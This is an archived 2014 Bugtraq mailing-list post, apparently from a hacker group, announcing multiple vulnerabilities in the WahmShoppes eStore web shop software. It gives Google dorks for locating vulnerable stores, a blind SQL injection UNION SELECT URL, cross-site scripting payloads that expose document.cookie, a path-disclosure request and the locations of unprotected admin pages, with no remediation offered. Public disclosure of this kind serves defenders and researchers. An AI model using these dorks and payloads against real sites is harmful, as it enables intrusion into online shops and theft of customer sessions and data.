lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201406051423.s55ENqcl000804@sf01web1.securityfocus.com>
Date: Thu, 5 Jun 2014 14:23:52 GMT
From: cseye_ut@...oo.com
To: bugtraq@...urityfocus.com
Subject: multiple Vulnerability in "WahmShoppes eStore"

#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Title : multiple Vulnerability in "WahmShoppes eStore"
# Author : alieye
# vendor : http://www.wahmshoppes.com/
# Contact : cseye_ut@...oo.com
# Risk : High
# Class: Remote
# Google Dork: 
# inurl:WsError.asp 
# inurl:store/ We apologize but your request rendered no results
# Version: all version
# Date: 05/06/2014
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++

1-Blind SQL Injection

http://victim.com/store/WsDefault.asp?One=-999 AND 1=1+UNION+SELECT+...etc
---------------------------------------------------------

2-Cross Site Scripting

http://victim.com/store/WsError.asp?msg=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://victim.com/store/WsRequestpwd.asp?msg=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
---------------------------------------------------------

3-Information Disclosure in image location

http://victim.com/store/thumb.asp?path=X:/server path and domain name/example.jpg 
---------------------------------------------------------

4-show admin panel tools

http://victim.com/store/frmLeft.asp
---------------------------------------------------------

Admin page

http://victim.com/store/admin/Default.asp

#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , andelos , 3.14nnph , f4rm4nd3 and all cseye members
[#] Thanks To All Iranian Hackers
[#] website : http://cseye.vcp.ir/
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ